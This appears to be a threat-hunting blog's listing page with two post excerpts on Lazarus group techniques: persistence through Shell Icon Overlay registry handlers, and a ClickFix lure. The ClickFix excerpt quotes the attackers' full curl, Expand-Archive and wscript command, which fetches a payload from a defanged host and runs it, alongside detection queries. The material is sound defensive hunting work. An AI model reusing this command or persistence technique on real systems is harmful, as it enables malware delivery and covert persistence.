Posts

Showing posts with the label lazarus

327. Adversaries Use Shell Icon Overlay Handlers for Persistence

Image
Hello everyone! Let's look at another not common persistence mechanism, which involves abusing Shell Icon Overlay handlers and registry modification. Advanced techniques are for advanced adversaries, so today we'll look at Lazarus  (or Lazer Werewolf). As part of persistence, the threat actors modified the following registry key: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers This allows the adversary to abuse the Shell Icon Overlay handler to load the payload each time the user logs in. So it's another notable registry key for monitoring: event_type: "registryvaluesetwin" AND reg_key_path: "ShellIconOverlayIdentifiers" See you tomorrow!

241. That's How Lazarus Adopted ClickFix and How to Hunt It

Image
Hello everyone! ClickFix technique becomes more and more popular, and is now a part of arsenal of even state-sponsored adversaries. Today we'll look at how Lazarus (or Lazer Werewolf ) leverages this technique, and extract hunting opportunities. So, the adversary used the following command: curl -k -o "%TEMP%\nvidiaRelease.zip" hXXps://driverservices[.]store/visiodrive/nvidiaRelease.zip && powershell -Command "Expand-Archive -Force -Path '%TEMP%\nvidiaRelease.zip' -DestinationPath '%TEMP%\nvidiaRelease'" && wscript "%TEMP%\nvidiaRelease\run.vbs" Here we have at least three hunting opportunities. The first one, using cURL to download a file to a temp folder. I included the arguments used by the threat actors (-k ignores SSL certificate errors; -o specifies output file path): event_type: "processcreatewin" AND proc_file_path: "curl.exe" AND cmdline: ("k" AND "o" AND "temp"...